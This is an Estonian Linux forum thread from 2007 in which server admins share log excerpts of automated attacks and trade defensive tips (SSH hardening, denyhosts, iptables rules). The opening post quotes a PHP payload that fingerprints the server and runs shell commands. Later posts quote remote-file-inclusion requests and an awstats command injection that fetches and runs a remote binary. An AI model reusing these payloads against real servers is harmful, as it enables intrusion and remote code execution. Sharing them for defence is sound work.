Portaal Portaal Pingviini veeb foorumi pealeht
  Viki  |  IRC  |  Otsing  |  Küsimused ja vastused  |  Profiil  |  Privaatsõnumite vaatamiseks logi sisse  | Logi sisse või Registreeru
<empty>
Vaata järgmist teemat
Vaata eelmist teemat

Postita uus teemaVasta teemale
Autor Sõnum
olavsu1


Vana Pingviin
Vana Pingviin


Vanus: 48
Liitunud: 01.12.2006
Postitused: 923

Distributsioon: ubuntu, mandriva
estonia.gif
postituspostitatud: 19.10.2007, 00:04  postituse pealkiri:  keski/miski pahalane scannib servereid.  

PHP:
<?
$dir = @getcwd();
$ker = @php_uname();
echo &quot;31337<br>&quot;;
$OS = @PHP_OS;
echo &quot;<br>OSTYPE:$OS<br>&quot;;
echo &quot;<br>Kernel:$ker<br>&quot;;
$free = disk_free_space($dir); 
if ($free === FALSE) {$free = 0;} 
if ($free < 0) {$free = 0;} 
echo &quot;Free:&quot;.view_size($free).&quot;<br>&quot;; 
$cmd=&quot;id&quot;;
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join(&quot;\n&quot;,$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,&quot;r&quot;))){
$res = &quot;&quot;;
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size) 

if (!is_numeric($size)) {return FALSE;} 
else 

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 .&quot; GB&quot;;} 
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 .&quot; MB&quot;;} 
elseif ($size >= 1024) {$size = round($size/1024*100)/100 .&quot; KB&quot;;} 
else {$size = $size . &quot; B&quot;;} 
return $size; 
}


?>


milleks küll sellise jutuga servereid urgitseda? seda juttu proovitakse käima saada nõnda et kaitsmata muutujale proovitakse teisest servetist see jutt sisse panna et rünnatav servu selle käima tõmbab. kellele on vaja teada kui palju miskis serveris vaba kettaruumi on. ma panin tolle funksiooni keelatute alla ja seda sorti useragenti "libwww-perl/5.808" saadan kuhugi mujale.

kas kellegi on mõni idee taolise nuuskimise ärahoidmiseks?


estysoft
Pingviini aktivist
Pingviini aktivist


Vanus: 39
Liitunud: 13.07.2006
Postitused: 130


estonia.gif
postituspostitatud: 19.10.2007, 01:10  postituse pealkiri:  (teema puudub)  

no kui juba see käima saadakase siis saab ju ka näiteks faile üles laadida ja hostida näiteks.

aga kuidas sa selle leidsid?
ma tahaks ka teada kas mind skännitakse.


olavsu1


Vana Pingviin
Vana Pingviin


Vanus: 48
Liitunud: 01.12.2006
Postitused: 923

Distributsioon: ubuntu, mandriva
estonia.gif
postituspostitatud: 19.10.2007, 10:17  postituse pealkiri:  (teema puudub)  

serveri access logi uurides leian alati et keegi kuskilt on proovinud miskit . mõni tüüp haamerdab päris kõvasti enne kui rahule jätab. tundub et automatiseeritud häkkimine toimub.
meili servu admin konto on pideva löögiall, hiinlased tahavad sinna kangesti sisse pääseda.

_________________
olen Troll ja ootan pingviin.org konto sulgemist.

antik2
Vana Pingviin
Vana Pingviin



Liitunud: 09.10.2006
Postitused: 634

Distributsioon: Big Strong D...
blank.gif
postituspostitatud: 19.10.2007, 21:46  postituse pealkiri:  (teema puudub)  

olavsu1 kirjutas:
serveri access logi uurides leian alati et keegi kuskilt on proovinud miskit . mõni tüüp haamerdab päris kõvasti enne kui rahule jätab. tundub et automatiseeritud häkkimine toimub.
meili servu admin konto on pideva löögiall, hiinlased tahavad sinna kangesti sisse pääseda.


Aga kes keelab sul root kasutaja sisselogimise ssh-s kinni keerata? Logi sisse tavalise kasutajana ja siis pressi -su. Lisaks paigalda denyhosts proge mis jälgib reaalajas kasutajanimede ja paroolide proovimist ning 10 järjestikuse vale logimise järgi blokeerib ründaja ip-aadressi mingiks ajaks.


spott
Admin
Admin


Vanus: 43
Liitunud: 04.06.2005
Postitused: 8857

Distributsioon: Ubuntu
estonia.gif
postituspostitatud: 20.10.2007, 08:35  postituse pealkiri:  (teema puudub)  

Ise kasutan just antiki soovitatud lahendust

_________________
Tellige endale sünnipäevaks, sõbrapäevaks või muuks tähtpäevaks kingitus: Kingitused internetist - NetiKink.eu

olavsu1


Vana Pingviin
Vana Pingviin


Vanus: 48
Liitunud: 01.12.2006
Postitused: 923

Distributsioon: ubuntu, mandriva
estonia.gif
postituspostitatud: 20.10.2007, 23:08  postituse pealkiri:  (teema puudub)  

server on win2k ja kasutab http://www.sambar.com softi , blokib 5 viie vigase asja järel ja saadab kuhugi umbluu saidile..

mul on slogimiste jälitus serverisse sisse ehitatud
Kood:
Monitor Invalid Logins = true
Maximum Invalid Logins = 10
Invalid Login Wait = 600
Monitor Invalid Requests = true
Maximum Invalid Requests = 5
Invalid Request Wait = 3600


umbluu saidile saadetakse libwww-perl tegelased ja mõne downloaderi kasutajad veel.


obundra
Vana Pingviin
Vana Pingviin


Vanus: 49
Liitunud: 04.08.2005
Postitused: 1213
Asukoht: 127.0.0.1
Distributsioon: RHEL, Solaris, Debian, Gentoo
estonia.gif
postituspostitatud: 21.10.2007, 17:19  postituse pealkiri:  (teema puudub)  

Mul on ssh konfiga sisselogimine roodule keelatud ja lubatud ainult ühele kindlale listis olevale kasutajale vaid teatud ip-delt.Logifailides leidus muidu ikka iga päeva kohta hunnik sisselogimiskatseid.Lisaks sai tulemüüri lisatud paar reeglit mis sissetrügijaid samuti veidi eemal aitab hoida.Iptablesi skripti tarvis sellised read:
Kood:
# ssh-ga saab sisse logida 2X 10 minuti jooksul
iptables -I INPUT -p tcp --dport 22 -i $V2LISLIIDES -m state --state NEW -m recent --set
iptables -I INPUT -p tcp --dport 22 -i $V2LISLIIDES -m state --state NEW -m recent --update --seconds 600 --hitcount 2 -j DROP

# Pordiskänneritele 24 tundi mõtlemisaega

iptables -A INPUT -i $V2LISLIIDES -m recent --name portscan --rcheck --seconds 86400 -j DROP
iptables -A FORWARD -i $V2LISLIIDES -m recent --name portscan --rcheck --seconds 86400 -j DROP

# Peale 24 tundi pordiskännerite list tühjaks

iptables -A INPUT -i $V2LISLIIDES -m recent --name portscan --remove
iptables -A FORWARD -i $V2LISLIIDES -m recent --name portscan --remove

_________________
IT teenused

johnsmith
Vana Pingviin
Vana Pingviin


Vanus: 50
Liitunud: 24.07.2006
Postitused: 714
Asukoht: Universum
Distributsioon: Ubuntu/Gentoo/FreeBSD
finland.gif
postituspostitatud: 21.10.2007, 18:01  postituse pealkiri:  (teema puudub)  

Ma arvan, et kui inimene oskab juba ssh -ga sisse logida ja üldse cli -d kasutada siis oskab ta ka valida muu pordi kui 22 sisse logides.

Keegi ei viitsi skannida kõiki porte vaid ikka skannitakse tuntuid service porte.

Pane ssh daemon kuulama mingit kõrgemat suvalist porti ja võid ära unustada logifaili lugemise vähemalt mis puudutab ssh -d.

Eelnevalt Obundra poolt mainitud teatud kasutaja lubamine peaks ka olema elementaarne.

_________________
"Thinking is the hardest work there is, which is probably the reason why so few engage in it" - Henry Ford

olavsu1


Vana Pingviin
Vana Pingviin


Vanus: 48
Liitunud: 01.12.2006
Postitused: 923

Distributsioon: ubuntu, mandriva
estonia.gif
postituspostitatud: 21.10.2007, 20:57  postituse pealkiri:  (teema puudub)  

Kood:
[2007-10-18 06:09:43] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [CONNECT]
[2007-10-18 06:09:48] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [EHLO] UATIM-F7E7949C7
[2007-10-18 06:09:50] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH] LOGIN
[2007-10-18 06:09:51] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH User] webmaster
[2007-10-18 06:09:52] FAILED [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH Passwd] webmaster {Invalid password}
[2007-10-18 06:09:52] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH] LOGIN {Invalid command sequence (AUTH unexpected).}
[2007-10-18 06:09:53] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH] LOGIN {Invalid command sequence (AUTH unexpected).}
[2007-10-18 06:09:54] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH] LOGIN {Invalid command sequence (AUTH unexpected).}
[2007-10-18 06:09:55] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH] LOGIN {Invalid command sequence (AUTH unexpected).}
[2007-10-18 06:09:56] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH] LOGIN {Invalid command sequence (AUTH unexpected).}


meliservu logist (smtp.log) leian alatasa selliseid ridu. SSL iga pole mitte mingit seost.


antik2
Vana Pingviin
Vana Pingviin



Liitunud: 09.10.2006
Postitused: 634

Distributsioon: Big Strong D...
blank.gif
postituspostitatud: 29.10.2007, 21:44  postituse pealkiri:  (teema puudub)  

olavsu1 kirjutas:
Kood:
[2007-10-18 06:09:43] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [CONNECT]
[2007-10-18 06:09:48] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [EHLO] UATIM-F7E7949C7
[2007-10-18 06:09:50] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH] LOGIN
[2007-10-18 06:09:51] OK [115986416] pected).}


meliservu logist (smtp.log) leian alatasa selliseid ridu. SSL iga pole mitte mingit seost.


Võid rahuliku südamega kõik .cn domeenid ära plokkida ja ei juhtu midagi halba (ainult head).


imre
Vana Pingviin
Vana Pingviin



Liitunud: 16.08.2005
Postitused: 2648
Asukoht: Saku kant
Distributsioon: Ubuntu
estonia.gif
postituspostitatud: 29.10.2007, 22:37  postituse pealkiri:  (teema puudub)  

Ise kasutan johnsmithi soovitatut.
Kõrgema pordi peale ja igasugune scännimine lõppes koheselt.
Aga ma olen laisk ka muidugi Razz

_________________
Enne teema püstitamist kasutage OTSINGUT
Küsi targalt: Infot siit!
Kui aru ei saa, siis küsi.

olavsu1


Vana Pingviin
Vana Pingviin


Vanus: 48
Liitunud: 01.12.2006
Postitused: 923

Distributsioon: ubuntu, mandriva
estonia.gif
postituspostitatud: 02.11.2007, 00:18  postituse pealkiri:  (teema puudub)  

Kood:
nl61.yourname.nl 82.192.68.61 - - [28/Oct/2007:23:27:59 +0200] "GET /base.php?phpbb_root_path=http://stevenssharks.com/webcalendar/ws/cmd.txt? HTTP/1.1" 403 950 "-" "libwww-perl/5.79"
mail.onco-web.com 69.20.16.245 - - [28/Oct/2007:23:30:02 +0200] "GET /base.php?phpbb_root_path=http://stevenssharks.com/webcalendar/ws/strings.txt? HTTP/1.0" 403 950 "-" "libwww-perl/5.53"
mail.onco-web.com 69.20.16.245 - - [28/Oct/2007:23:30:03 +0200] "GET /base.php?phpbb_root_path=http://stevenssharks.com/webcalendar/ws/strings.txt? HTTP/1.0" 403 950 "-" "libwww-perl/5.53"


sedasi siis käib, kui mul poleks to muutuja kaitstus siis vist avastaksin midagi head ja ilusat oma arvutist.


olavsu1


Vana Pingviin
Vana Pingviin


Vanus: 48
Liitunud: 01.12.2006
Postitused: 923

Distributsioon: ubuntu, mandriva
estonia.gif
postituspostitatud: 21.11.2007, 16:09  postituse pealkiri:  (teema puudub)  

Kood:
h162-040-091-117.adsl.navix.net 162.40.91.117 - - [21/Nov/2007:04:41:02 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.21/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1" 404 621 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)Connection: close"


jälle uus ja huvitav asi. juhuks kui keegi saab sellejärgi oma servut turvata.


Näita (aja järgi):      
Postita uus teemaVasta teemale


Vaata järgmist teemat
Vaata eelmist teemat
Powered by phpBB2 Plus based on phpBB © 2001/7 phpBB Group